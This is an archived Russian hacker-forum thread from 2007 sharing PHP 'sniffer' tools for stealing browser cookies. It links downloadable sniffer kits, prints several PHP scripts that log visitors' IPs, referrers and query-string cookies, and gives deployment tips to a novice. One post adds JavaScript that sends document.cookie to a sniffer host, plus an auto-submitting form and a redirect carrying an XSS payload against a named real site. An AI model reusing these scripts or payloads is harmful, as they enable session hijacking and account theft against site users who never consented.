PDA

Просмотр полной версии : php sniffers

ettee
04.08.2007, 23:09
Tontonq's Cookie Sniffer v4.0 (http://someshit.net/files/s/TCS.zip)
Sniffer Script [Powered by SPG] (http://someshit.net/files/s/sniffer_scriptSPG.rar)
V-team sniffer (http://someshit.net/files/s/vTeam.zip)
Pro Hack sniffer [by loader] (http://someshit.net/files/s/psnif.rar)
php Based Sniffer v2.xx © Kanick 2005 Модифицирован АНТИЧАТ.РУ (http://someshit.net/files/s/phpBSKanick.zip)
php Based Sniffer 4.1 Personal © Kanick (http://someshit.net/files/s/KanickB.zip)
Spy Image 2.0 (http://someshit.net/files/s/spimg.zip)

[php]
<?php
$date=date("[D|d/m/Y|H:i]");
$ip=getenv("Remote_addr");
$real_ip=getenv("HTTP_X_FORWARDED_FOR");
$otkuda=getenv("HTTP_REFERER");
$browser=getenv("HTTP_USER_AGENT");
$win=getenv("windir");
$uid=implode($argv," ");
//Открытие файла лога и запись в него данных, закрытие лога
$fp=fopen("log.txt","a");
fputs($fp,"$datet|$uid|t$ip($real_ip)t$browsert$otkudat$winn");
fclose($fp);
?>

<?
$snif[] = date("d.m.Y H:i"); // дата
$snif[] = $_SERVER['REMOTE_ADDR']; // айпишник юзверя
@$snif[] = $_SERVER['HTTP_REFERER']; // рефер
@$snif[] = $_SERVER['QUERY_STRING']; // переданные параметру снифферу
$snif[] = $_SERVER['HTTP_USER_AGENT']; // агент юзверя =)
$file = "file.txt"; // файл в который будут записаны данные
$s = fopen($file,"a+");
@$sa = fread ($s,filesize($file));
$fp = fopen($file,"w");
foreach ($snif as $sniffed)
{
fwrite($fp,"\n".$sniffed);
}
fwrite($fp,"\n");
fwrite($s,$sa);
fclose($s);
fclose($fp);
?>
xaker-boss
16.08.2007, 10:20
Люди извеняюсь, ктонебуть потскажите какой из этих php sniffers лучше? и как им воспользоватся?
biophreak
16.08.2007, 11:31
Сложно сказать, какой лучше - все зависит от твоих нужд...
Если просто побаловаться - то советую сниферы от каника...
Если для редиректа или ифрейминга, то , ИМХО как можно проще(всмысле без наваротов) и с удобным выводом логов )))

ЗЗЫЖ А топикстартеру респект!
xaker-boss
16.08.2007, 11:46
Я скачал php Based Sniffer [phpBS] v2.xx © Kanick 2005 Модифицирован АНТИЧАТ.РУ
кто может обясните как его настроить и как запустить ?
Kaban
16.08.2007, 11:54
тебе нужен хостинг с поддержкой PHP.
s.gif - сам сниффер
log.php - просмотр логов
i.gif - картинка возращаемая браузеру! есле нет возврашаеться 1 пиксель
незабудь поставить CHMOD на data.txt - 666
biophreak
16.08.2007, 13:06
В log.php, если нужна авторизация:
$user = false; - измени на "юзер" - в кавычках
$passwd = false; - измение на "пароль" - в кавычках
И поменяй $auth = false; на true
И в страницу, на которой надо снифать - заинклудь файл s.gif

ЗЫЖ Вроде все правильно, если что не так - не ругай, ибо со сниферами дело не имел в виду ненадобности! :)
nonamez
16.08.2007, 23:25
подскажите снифер,который нормально сохраняет ссылку,по которой переходят
SSSetuPPP
16.10.2007, 02:39
тебе нужен хостинг с поддержкой PHP.
s.gif - сам сниффер
log.php - просмотр логов
i.gif - картинка возращаемая браузеру! есле нет возврашаеться 1 пиксель
незабудь поставить CHMOD на data.txt - 666

"незабудь поставить CHMOD на data.txt - 666" - Это как?
mR_LiNK[deface_0nl
16.10.2007, 05:02
"незабудь поставить CHMOD на data.txt - 666" - Это как?

Права на доступ к 'data.txt'
'666' - права на чтение и запись (для всех групп пользователей)

ЗЫ: 2Ettee -> зря здесь поместил, над было в полезные скрипты подшить!)
.:EnoT:.
16.10.2007, 15:06
не нравится мне сниффер Каника, не знаю почему, имхо лучше свой написать...там писать то нечего пару строк кода, зато запросто можно под свои нужды подстроить, что-то добавить, что-то убрать да и самому приятно ;)
biophreak
16.10.2007, 15:26
Товарищ, извиняюсь конечно, но от вас видна одна только критика...
Как говорица - не нравится, не юзай! (ничего личного)
Zitt
16.10.2007, 15:51
s.netsec.ru - лучший снифер =)
~!DoK_tOR!~
10.11.2007, 20:03
sniff1.php - Простейший пример снифера для cookie на PHP
sniff2.php - Самый простой пример отсылки cookie на снифер по адресу http://sniff/sniff
sniff3.php - Пример автоматической "переадресации" пользователя на страницу с посылкой POST параметров
sniff4.php - PHP скрипт редиректа на заXSSенную страничку

1.


<?
if(strlen($QUERY_STRING)<2)exit;
header("Content-Type: image/png");
$im=ImageCreate(1, 1);
ImagePNG($im);
imagedestroy($im);

$fp=fopen("sniff.txt", "a");

fputs($fp,$QUERY_STRING."\n\n");
fclose($fp);
?>


2.


<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>



3.

<html> <body onload="s.submit();"> <form name=s action=http://soft.mail.ru method=POST> <input type=hidden name=words value='" style=background:url(javascript:alert(document.coo kie)) "'> </form> </body> </html>

4.


<? header("Location: http://soft.mail.ru/search_result_header.php?qs=1&words=%22+style%3Dbackground%3Aurl%28javascript%3A alert%28document.cookie%29%29+%22") ?>





<?php
if(isset($QUERY_STRING))
{
$date= date('d.m.y : H:i:s');
$fp = fopen("./slg.txt", "a");
fputs($fp,"Date and Tiime: $date\n IP: $REMOTE_ADDR\n Refer: $HTTP_REFER\n Cookie: $QUERY_STRING\n Agent: $HTTP_USER_AGENT\n Host: $HTTP_HOST Server: $SERVER_PORT Script: $SCRIPT_NAME\n Method: $REQUEST_METHOD\n ");
fclose($fp);
}

?>